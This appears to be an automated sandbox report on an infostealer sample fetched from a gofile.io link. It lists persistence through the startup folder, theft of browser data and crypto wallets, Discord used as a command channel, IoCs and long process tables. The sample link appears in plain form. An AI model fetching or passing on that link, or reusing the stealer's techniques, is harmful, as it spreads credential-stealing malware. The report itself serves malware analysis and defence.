hxxps://gofile[.]io/d/LOwIP7

Analysis

max time kernel
348s
max time network
349s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
19/02/2024, 22:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/LOwIP7

Score

7^/10

persistence pyinstaller spyware stealer upx

Malware Config

Signatures

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPICGA~1.EXE	EPICGA~1.EXE

Executes dropped EXE 8 IoCs

pid	Process
5132	NoxieV1.33.exe
5968	acq1.EXE
2192	EPICGA~1.EXE
3264	EPICGA~1.EXE
2732	acq.exe
5772	acq.exe
3476	INTELG~1.EXE
6032	INTELG~1.EXE

Loads dropped DLL 64 IoCs

pid	Process
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
3264	EPICGA~1.EXE
5772	acq.exe
5772	acq.exe
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/6032-641-0x00007FFE28F80000-0x00007FFE29568000-memory.dmp	upx
behavioral1/memory/6032-642-0x00007FFE45500000-0x00007FFE45524000-memory.dmp	upx
behavioral1/memory/6032-643-0x00007FFE46F80000-0x00007FFE46F8F000-memory.dmp	upx
behavioral1/memory/6032-644-0x00007FFE454E0000-0x00007FFE454F9000-memory.dmp	upx
behavioral1/memory/6032-645-0x00007FFE454B0000-0x00007FFE454DD000-memory.dmp	upx
behavioral1/memory/6032-646-0x00007FFE45480000-0x00007FFE4548D000-memory.dmp	upx
behavioral1/memory/6032-647-0x00007FFE45440000-0x00007FFE45475000-memory.dmp	upx
behavioral1/memory/6032-648-0x00007FFE45490000-0x00007FFE454A9000-memory.dmp	upx
behavioral1/memory/6032-649-0x00007FFE45430000-0x00007FFE4543D000-memory.dmp	upx
behavioral1/memory/6032-650-0x00007FFE45400000-0x00007FFE4542E000-memory.dmp	upx
behavioral1/memory/6032-651-0x00007FFE3D720000-0x00007FFE3D7DC000-memory.dmp	upx
behavioral1/memory/6032-652-0x00007FFE44D20000-0x00007FFE44D4B000-memory.dmp	upx
behavioral1/memory/6032-653-0x00007FFE41C30000-0x00007FFE41C5E000-memory.dmp	upx
behavioral1/memory/6032-654-0x00007FFE3D660000-0x00007FFE3D718000-memory.dmp	upx
behavioral1/memory/6032-657-0x00007FFE36EA0000-0x00007FFE37215000-memory.dmp	upx
behavioral1/memory/6032-659-0x00007FFE411F0000-0x00007FFE41213000-memory.dmp	upx
behavioral1/memory/6032-660-0x00007FFE2C9E0000-0x00007FFE2CB53000-memory.dmp	upx
behavioral1/memory/6032-661-0x00007FFE41C10000-0x00007FFE41C25000-memory.dmp	upx
behavioral1/memory/6032-662-0x00007FFE41BF0000-0x00007FFE41C02000-memory.dmp	upx
behavioral1/memory/6032-663-0x00007FFE41BD0000-0x00007FFE41BE8000-memory.dmp	upx
behavioral1/memory/6032-664-0x00007FFE29860000-0x00007FFE2997C000-memory.dmp	upx
behavioral1/memory/6032-665-0x00007FFE419C0000-0x00007FFE419CB000-memory.dmp	upx
behavioral1/memory/6032-666-0x00007FFE3E010000-0x00007FFE3E01B000-memory.dmp	upx
behavioral1/memory/6032-667-0x00007FFE3DF40000-0x00007FFE3DF4C000-memory.dmp	upx
behavioral1/memory/6032-668-0x00007FFE3DF30000-0x00007FFE3DF3B000-memory.dmp	upx
behavioral1/memory/6032-669-0x00007FFE3DF10000-0x00007FFE3DF1C000-memory.dmp	upx
behavioral1/memory/6032-671-0x00007FFE3E100000-0x00007FFE3E114000-memory.dmp	upx
behavioral1/memory/6032-670-0x00007FFE3DF00000-0x00007FFE3DF0E000-memory.dmp	upx
behavioral1/memory/6032-672-0x00007FFE41B50000-0x00007FFE41B5B000-memory.dmp	upx
behavioral1/memory/6032-673-0x00007FFE3E0D0000-0x00007FFE3E0F6000-memory.dmp	upx
behavioral1/memory/6032-674-0x00007FFE3E050000-0x00007FFE3E088000-memory.dmp	upx
behavioral1/memory/6032-675-0x00007FFE3DF60000-0x00007FFE3DF6C000-memory.dmp	upx
behavioral1/memory/6032-676-0x00007FFE3DF50000-0x00007FFE3DF5B000-memory.dmp	upx
behavioral1/memory/6032-677-0x00007FFE3DF20000-0x00007FFE3DF2C000-memory.dmp	upx
behavioral1/memory/6032-678-0x00007FFE3DD80000-0x00007FFE3DD8C000-memory.dmp	upx
behavioral1/memory/6032-679-0x00007FFE3DC30000-0x00007FFE3DC3B000-memory.dmp	upx
behavioral1/memory/6032-680-0x00007FFE3DC20000-0x00007FFE3DC2C000-memory.dmp	upx
behavioral1/memory/6032-681-0x00007FFE3DC10000-0x00007FFE3DC1C000-memory.dmp	upx
behavioral1/memory/6032-682-0x00007FFE3DB10000-0x00007FFE3DB1D000-memory.dmp	upx
behavioral1/memory/6032-683-0x00007FFE3DAE0000-0x00007FFE3DAEC000-memory.dmp	upx
behavioral1/memory/6032-684-0x00007FFE3DD70000-0x00007FFE3DD7B000-memory.dmp	upx
behavioral1/memory/6032-685-0x00007FFE45500000-0x00007FFE45524000-memory.dmp	upx
behavioral1/memory/6032-686-0x00007FFE3DAF0000-0x00007FFE3DB02000-memory.dmp	upx
behavioral1/memory/6032-687-0x00007FFE28CF0000-0x00007FFE28F73000-memory.dmp	upx
behavioral1/memory/6032-689-0x00007FFE3DAD0000-0x00007FFE3DADA000-memory.dmp	upx
behavioral1/memory/6032-688-0x00007FFE28F80000-0x00007FFE29568000-memory.dmp	upx
behavioral1/memory/6032-690-0x00007FFE3DAA0000-0x00007FFE3DAC9000-memory.dmp	upx
behavioral1/memory/6032-691-0x00007FFE28F80000-0x00007FFE29568000-memory.dmp	upx
behavioral1/memory/6032-692-0x00007FFE45500000-0x00007FFE45524000-memory.dmp	upx
behavioral1/memory/6032-693-0x00007FFE46F80000-0x00007FFE46F8F000-memory.dmp	upx
behavioral1/memory/6032-694-0x00007FFE454E0000-0x00007FFE454F9000-memory.dmp	upx
behavioral1/memory/6032-695-0x00007FFE454B0000-0x00007FFE454DD000-memory.dmp	upx
behavioral1/memory/6032-696-0x00007FFE45490000-0x00007FFE454A9000-memory.dmp	upx
behavioral1/memory/6032-697-0x00007FFE45480000-0x00007FFE4548D000-memory.dmp	upx
behavioral1/memory/6032-698-0x00007FFE45440000-0x00007FFE45475000-memory.dmp	upx
behavioral1/memory/6032-699-0x00007FFE45430000-0x00007FFE4543D000-memory.dmp	upx
behavioral1/memory/6032-700-0x00007FFE45400000-0x00007FFE4542E000-memory.dmp	upx
behavioral1/memory/6032-701-0x00007FFE3D720000-0x00007FFE3D7DC000-memory.dmp	upx
behavioral1/memory/6032-703-0x00007FFE41C30000-0x00007FFE41C5E000-memory.dmp	upx
behavioral1/memory/6032-702-0x00007FFE44D20000-0x00007FFE44D4B000-memory.dmp	upx
behavioral1/memory/6032-704-0x00007FFE3D660000-0x00007FFE3D718000-memory.dmp	upx
behavioral1/memory/6032-705-0x00007FFE36EA0000-0x00007FFE37215000-memory.dmp	upx
behavioral1/memory/6032-706-0x00007FFE41C10000-0x00007FFE41C25000-memory.dmp	upx
behavioral1/memory/6032-708-0x00007FFE411F0000-0x00007FFE41213000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	acq1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NoxieV1.33.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 25 IoCs

Web Service

T1102

flow	ioc
123	discord.com
125	discord.com
144	discord.com
152	discord.com
122	discord.com
153	discord.com
140	discord.com
150	discord.com
151	discord.com
124	discord.com
146	discord.com
143	discord.com
147	discord.com
148	discord.com
132	discord.com
128	discord.com
133	discord.com
142	discord.com
129	discord.com
141	discord.com
149	discord.com
155	discord.com
145	discord.com
154	discord.com
127	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
108	api.ipify.org
109	api.ipify.org
162	api.ipify.org

Detects Pyinstaller 3 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000300000000073f-285.dat	pyinstaller
behavioral1/files/0x000300000000073f-286.dat	pyinstaller
behavioral1/files/0x000300000000073f-386.dat	pyinstaller

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133528554333017222"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3336	chrome.exe
3336	chrome.exe
624	msedge.exe
624	msedge.exe
3672	msedge.exe
3672	msedge.exe
5612	identity_helper.exe
5612	identity_helper.exe
5772	chrome.exe
5772	chrome.exe
5568	msedge.exe
5568	msedge.exe
5568	msedge.exe
5568	msedge.exe
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE
6032	INTELG~1.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
5220	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs

pid	Process
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeRestorePrivilege	5220	7zFM.exe
Token: 35	5220	7zFM.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe
Token: SeShutdownPrivilege	3336	chrome.exe
Token: SeCreatePagefilePrivilege	3336	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3336	chrome.exe
3336	chrome.exe

Suspicious use of SendNotifyMessage 56 IoCs

pid	Process
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3672	msedge.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe
3336	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3336 wrote to memory of 1112	3336	chrome.exe	52
PID 3336 wrote to memory of 1112	3336	chrome.exe	52
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 3700	3336	chrome.exe	86
PID 3336 wrote to memory of 4196	3336	chrome.exe	88
PID 3336 wrote to memory of 4196	3336	chrome.exe	88
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87
PID 3336 wrote to memory of 2228	3336	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/LOwIP7
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3336
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe3d909758,0x7ffe3d909768,0x7ffe3d909778
  2⤵
  PID:1112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1640 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:2
  2⤵
  PID:3700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2072 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:8
  2⤵
  PID:2228
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:8
  2⤵
  PID:4196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2928 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:1
  2⤵
  PID:2028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2936 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:1
  2⤵
  PID:5068
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4776 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:1
  2⤵
  PID:2172
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3296 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:8
  2⤵
  PID:1988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4804 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:1
  2⤵
  PID:1096
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5316 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:8
  2⤵
  PID:4032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5328 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:1
  2⤵
  PID:740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3260 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:8
  2⤵
  PID:3956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5548 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:8
  2⤵
  PID:2112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3452 --field-trial-handle=1832,i,6675179491837011280,6640012714253054697,131072 /prefetch:8
  2⤵
  PID:5200
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\NoxieGenV1.rar"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  PID:5220
- C:\Program Files\Google\Chrome\Application\chrome.exe
